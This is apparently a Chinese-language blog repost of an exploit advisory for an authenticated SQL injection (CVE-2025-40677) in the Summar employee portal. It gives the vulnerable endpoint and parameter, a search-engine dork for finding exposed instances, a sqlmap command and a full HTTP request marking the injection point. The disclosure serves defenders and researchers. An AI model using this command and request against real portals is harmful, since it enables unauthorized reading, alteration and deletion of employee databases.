Summar员工门户3.98.0认证SQL注入漏洞深度分析

本文详细分析了Summar员工门户软件3.98.0版本中存在的认证SQL注入漏洞(CVE-2025-40677)。攻击者可通过特定POST参数执行SQL注入,实现对数据库的增删改查操作。文中提供了完整的漏洞利用细节、测试环境及利用工具sqlmap的具体命令。

Summar员工门户 3.98.0 - 认证SQL注入

风险等级: 中等 本地利用: 否 远程利用: 是 CVE编号: CVE-2025-40677 CWE编号: CWE-89 Google搜索语法: inurl:"/MemberPages/quienesquien.aspx"

漏洞详情

漏洞标题: Summar员工门户 3.98.0 - 认证SQL注入 发现日期: 2025年9月22日 漏洞作者: Peter Gabaldon - https://pgj11.com/ 厂商主页: https://www.summar.es/ 软件链接: https://www.summar.es/software-recursos-humanos/ 影响版本: 低于 3.98.0 测试环境: Kali Linux 漏洞描述: Summar软件公司的"Portal del Empleado"(员工门户)存在SQL注入漏洞。该漏洞允许攻击者通过向/MemberPages/quienesquien.aspx发送POST请求,利用参数ctl00$ContentPlaceHolder1$filtroNombre,实现对数据库的检索、创建、更新和删除操作。

技术细节

利用工具sqlmap命令示例

1
$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

HTTP请求示例

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
 
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&

: 漏洞利用需要经过身份验证的会话。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计